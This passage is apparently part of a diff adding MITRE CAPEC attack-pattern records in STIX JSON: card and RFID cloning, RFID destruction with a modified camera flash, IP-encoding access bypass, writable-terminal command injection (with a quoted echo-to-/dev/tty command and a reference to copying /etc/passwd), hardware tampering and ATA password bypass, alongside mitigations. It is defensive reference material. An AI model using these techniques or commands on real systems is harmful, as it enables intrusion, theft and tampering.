+ "attack-pattern--309b5fec-8a59-4d28-8a1c-427d289aad93", + "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-397: Cloning Magnetic Strip Cards, CAPEC-398: Magnetic Strip Card Brute Force Attacks, CAPEC-399: Cloning RFID Cards or Chips and CAPEC-400: RFID Chip Deactivation or Destruction. Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-396", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/396.html" + } + ], + "id": "attack-pattern--631dcf7a-d23f-45b3-b72a-ebd5a3625aeb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: Bypassing Card or Badge-Based Systems", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker duplicates the data on a Magnetic strip card (i.e. 'swipe card' or 'magstripe') to gain unauthorized access to a physical location or a person's private information. Magstripe cards encode data on a band of iron-based magnetic particles arrayed in a stripe along a rectangular card. Most magstripe card data formats conform to ISO standards 7810, 7811, 7813, 8583, and 4909. The primary advantage of magstripe technology is ease of encoding and portability, but this also renders magnetic strip cards susceptible to unauthorized duplication. 
If magstripe cards are used for access control, all an attacker need do is obtain a valid card long enough to make a copy of the card and then return the card to its location (i.e. a co-worker's desk). Magstripe reader/writers are widely available as well as software for analyzing data encoded on the cards. By swiping a valid card, it becomes trivial to make any number of duplicates that function as the original.", + "external_references": [ + { + "external_id": "CAPEC-397", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/397.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--19015961-475c-438b-887b-e3d66a9143de", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cloning Magnetic Strip Cards", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary analyzes the data on two or more magnetic strip cards and is able to generate new cards containing valid sequences that allow unauthorized access and/or impersonation of individuals.", + "external_references": [ + { + "external_id": "CAPEC-398", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/398.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": 
"reference_from_CAPEC" + } + ], + "id": "attack-pattern--65737f80-588a-449a-af08-0508486d9481", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Magnetic Strip Card Brute Force Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_extended_description": "\n Often, magnetic strip encoding methods follow a common format for a given system laid out in up to three tracks. A single card may allow access to a corporate office complex shared by multiple companies. By analyzing how the data is stored on a card, it is also possible to create valid cards via brute-force attacks.\n For example, a single card can grant access to a building, a floor, and a suite number. Reading and analyzing data on multiple cards, then performing a difference analysis between data encoded on three different cards, can reveal clues as to how to generate valid cards that grant access to restricted areas of a building or suites/rooms within that building. Data stored on magstripe cards is often unencrypted, therefore comparing which data changes when two or more cards are analyzed can yield results that aid in determining the structure of the card data. A trivial example would be a common system data format on a data track which binary encodes the suite number of a building that a card will open. By creating multiple cards with differing binary encoded segments it becomes possible to enter unauthorized areas or pass through checkpoints giving the electronic ID of other persons.\n ", + "x_capec_prerequisites": [ + "The ability to calculate a card checksum and write out a valid checksum value. 
Some cards are protected by a checksum calculation, therefore it is necessary to determine what algorithm is being used to calculate the checksum and to employ that algorithm to calculate and write a new valid checksum for the card being created." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker analyzes data returned by an RFID chip and uses this information to duplicate a RFID signal that responds identically to the target chip. In some cases RFID chips are used for building access control, employee identification, or as markers on products being delivered along a supply chain. Some organizations also embed RFID tags inside computer assets to trigger alarms if they are removed from particular rooms, zones, or buildings. Similar to Magnetic strip cards, RFID cards are susceptible to duplication (cloning) and reuse.", + "external_references": [ + { + "external_id": "CAPEC-399", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/399.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ca237733-be3e-4d9c-85a0-d18cb1c8295d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cloning RFID Cards or Chips", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_extended_description": "\n RFID (Radio Frequency Identification) are passive devices which consist of an integrated circuit for processing RF signals and an antenna. 
RFID devices are passive in that they lack an on on-board power source. The majority of RFID chips operate on either the 13.56 MHz or 135 KHz frequency. The chip is powered when a signal is received by the antenna on the chip, powering the chip long enough to send a reply message. An attacker is able to capture and analyze RFID data by either stimulating the chip to respond or being proximate to the chip when it sends a response to a remote transmitter. This allows the attacker to duplicate the signal and conduct attacks such as gaining unauthorized access to a building or impersonating a user's identification.\n ", + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack relies on the adversary using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names (FQDNs), URL, IP address, or IP Address ranges. If the location information is not validated against a variety of different possible encodings and formats, the adversary can use an alternate format to bypass application access control.", + "external_references": [ + { + "external_id": "CAPEC-4", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/4.html" + }, + { + "external_id": "CWE-291", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/291.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Using Alternative IP Address Encodings", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary identifies an application server that applies a security policy based on the domain and application name. For example, the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by using the IP address of the host instead (http://192.168.0.1:8080/application), the application authentication and authorization controls may be bypassed. The adversary relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for IP addresses as user input: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application where IP addresses are used.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts alternate IP address encodings, observing application behavior. The adversary will also attempt to access the application through an alternate IP address encoding to see if access control changes

  2. Techniques
    Instead of using a URL, use the IP address that the URL resolves to
    Specify a port directly to a URL input
    Omit or add \"http://\" or \"https://\" to a URL to see if the application behaves differently

Exploit

  1. Bypass access control: Using an alternate IP address encoding, the adversary will either access the application or give the alternate encoding as input, bypassing access control restrictions.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target software must fail to anticipate all of the possible valid encodings of an IP/web address.", + "The adversary must have the ability to communicate with the server." + ], + "x_capec_resources_required": [ + "The adversary needs to have knowledge of an alternative IP address encoding that bypasses the access control policy of an application. Alternatively, the adversary can simply try to brute-force various encoding possibilities." + ], + "x_capec_skills_required": { + "Low": "The adversary has only to try IP address format combinations." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Default deny access control policies", + "id": "course-of-action--f365abec-a16c-48a7-ae51-bdc687d899bb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-4-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--484c12f4-80ad-4fe0-91ec-ad26afdc6082", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f365abec-a16c-48a7-ae51-bdc687d899bb", + "target_ref": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation routines should check and enforce both input data types and content against a positive 
specification. In regards to IP addresses, this should include the authorized manner for the application to represent IP addresses and not accept user specified IP addresses and IP address formats (such as ranges)", + "id": "course-of-action--a4679da3-09cf-480b-ad0c-5606e510b08d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-4-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b789de10-900c-4578-a3f2-13683cc5bbc8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4679da3-09cf-480b-ad0c-5606e510b08d", + "target_ref": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--62c4c1aa-5430-4146-8735-ca6959483c64", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack exploits terminal devices that allow themselves to be written to by other users. 
The attacker sends command strings to the target terminal device hoping that the target user will hit enter and thereby execute the malicious command with their privileges. The attacker can send the results (such as copying /etc/passwd) to a known directory and collect once the attack has succeeded.", + "external_references": [ + { + "external_id": "CAPEC-40", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/40.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating Writeable Terminal Devices", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n \"Any system that allows other peers to write directly to its terminal process is vulnerable to this type of attack. If the terminals are available through being over-privileged (i.e. 
world-writable) or the attacker is an administrator, then a series of commands in this format can be used to echo commands out to victim terminals.\n \"$echo -e \"\\033[30m\\033\\132\" > /dev/ttyXX\n where XX is the tty number of the user under attack. This will paste the characters to another terminal (tty). Note this technique works only if the victim's tty is world writable (which it may not be). That is one reason why programs like write(1) and talk(1) in UNIX systems need to run setuid.\" [REF-1]\n If the victim continues to hit \"enter\" and execute the commands, there are an endless supply of vectors available to the attacker, copying files, open up network connections, ftp out to servers, and so on.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify attacker-writable terminals: Determine if users TTYs are writable by the attacker.

  2. Techniques
    Determine the permissions for the TTYs found on the system. Any that allow user write to the TTY may be vulnerable.
    Attempt to write to other user TTYs. This approach could leave a trail or alert a user.

Exploit

  1. Execute malicious commands: Using one or more vulnerable TTY, execute commands to achieve various impacts.

  2. Techniques
    Commands that allow reading or writing end user files can be executed.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "User terminals must have a permissive access control such as world writeable that allows normal users to control data on other user's terminals." + ], + "x_capec_resources_required": [ + "Access to a terminal on the target network" + ], + "x_capec_skills_required": { + "Low": "Ability to discover permissions on terminal devices. Of course, brute force can also be used." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that terminals are only writeable by named owner user and/or administrator", + "id": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-40-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f41d0244-df5c-41e8-9fd1-046642dd7609", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "target_ref": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b79f1d6a-d501-4456-9de3-b3cf4778b8f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses methods to deactivate a passive RFID tag for the purpose of rendering the tag, badge, card, or object containing the tag unresponsive. RFID tags are used primarily for access control, inventory, or anti-theft devices. The purpose of attacking the RFID chip is to disable or damage the chip without causing damage to the object housing it.", + "external_references": [ + { + "external_id": "CAPEC-400", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/400.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--309b5fec-8a59-4d28-8a1c-427d289aad93", + "modified": "2022-02-22T00:00:00.000Z", + "name": "RFID Chip Deactivation or Destruction", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_extended_description": "\n When correctly performed the RFID chip can be disabled or destroyed without visible damage or marking to whatever item or device containing the chip. Attacking the chip directly allows for the security device or method to be bypassed without directly damaging the device itself, such as an alarm system or computer system. Various methods exist for damaging or deactivating RFID tags. 
For example, most common RFID chips can be permanently destroyed by creating a small electromagnetic pulse near the chip itself. One method employed requires the modifying a disposable camera by disconnecting the flash bulb and soldering a copper coil to the capacitor. Firing the camera in this configuration near any RFID chip-based device creates an EMP pulse sufficient to destroy the chip without leaving evidence of tampering. So far this attack has been demonstrated to work against RFID chips in the 13.56 MHz range.\n ", + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to gain access to currently installed hardware and precedes to implement changes or secretly replace a hardware component which undermines the system's integrity for the purpose of carrying out an attack.", + "external_references": [ + { + "external_id": "CAPEC-401", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/401.html" + }, + { + "external_id": "CWE-1263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1263.html" + } + ], + "id": "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Physically Hacking Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "A malicious subcontractor or subcontractor's employee that is responsible for system maintenance secretly replaces a hard drive with one containing malicious code that will allow for backdoor access once deployed." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in ATA security on a drive to gain access to the information the drive contains without supplying the proper credentials. ATA Security is often employed to protect hard disk information from unauthorized access. The mechanism requires the user to type in a password before the BIOS is allowed access to drive contents. Some implementations of ATA security will accept the ATA command to update the password without the user having authenticated with the BIOS. This occurs because the security mechanism assumes the user has first authenticated via the BIOS prior to sending commands to the drive. Various methods exist for exploiting this flaw, the most common being installing the ATA protected drive into a system lacking ATA security features (a.k.a. hot swapping). 
Once the drive is installed into the new system the BIOS can be used to reset the drive password.", + "external_references": [ + { + "external_id": "CAPEC-402", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/402.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Oliver Tennert, Using the ATA security features of modern hard disks and SSDs, 2014, Admin Magazine", + "external_id": "REF-701", + "source_name": "reference_from_CAPEC", + "url": "https://www.admin-magazine.com/Archive/2014/19/Using-the-ATA-security-features-of-modern-hard-disks-and-SSDs" + }, + { + "description": "Breaking ATA Password Security, The University of Texas at Austin Information Security Office", + "external_id": "REF-702", + "source_name": "reference_from_CAPEC", + "url": "https://security.utexas.edu/education-outreach/BreakingATA" + } + ], + "id": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Bypassing ATA Password Security", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n The A-FF Repair Station tool is a data recovery utility that can be used for ATA password removal (both High and Maximum level) and firmware area recovery. An adversary with access to this tool could reset the ATA password to bypass this security feature and unlock the hard drive. 
The adversary could then obtain any data contained within the drive. [REF-702]\n ", + "\n An adversary gains physical access to the targeted hard drive and installs it into a system that does not support ATA security features. Once the drive is installed in the feature-lacking system, the adversary is able to reset the hard drive password via the BIOS. As a result, the adversary is able to bypass ATA password security and access content on the drive.\n " + ], + "x_capec_prerequisites": [ + "Access to the system containing the ATA Drive so that the drive can be physically removed from the system." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid using ATA password security when possible.", + "id": "course-of-action--2ca19cbb-9df1-447b-9d02-9b8639ed2018", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-402-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7a9a4381-1976-470b-8e7a-9b7154f17fa9", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2ca19cbb-9df1-447b-9d02-9b8639ed2018", + "target_ref": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use full disk encryption to protect the entire contents of the drive or sensitive partitions on the drive.", + "id": "course-of-action--42bee69d-54e9-4b16-8e31-ea5eadd37120", 
+ "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-402-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3007f9eb-cd21-4e1f-b66e-4faf4bc852de", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--42bee69d-54e9-4b16-8e31-ea5eadd37120", + "target_ref": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage third-party utilities that interface with self-encrypting drives (SEDs) to provide authentication, while relying on the SED itself for data encryption.", + "id": "course-of-action--f9e11632-380e-4024-ab7e-cfba51c77caa", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-402-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39c5db88-5296-4b0f-b4df-2621887afa62", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f9e11632-380e-4024-ab7e-cfba51c77caa", + "target_ref": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-404", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/404.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--93f7216f-ddbe-4484-8fa6-87b680f16898", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Social Information Gathering Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. 
Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-405", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/405.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--d4fd1606-6a28-4831-956b-ceab18f3546a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Social Information Gathering via Research", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary cases an establishment and searches through trash bins, dumpsters, or areas where company information may have been accidentally discarded for information items which may be useful to the dumpster diver. The devastating nature of the items and/or information found can be anything from medical records, resumes, personal photos and emails, bank statements, account details or information about software, tech support logs and so much more, including hardware devices. 
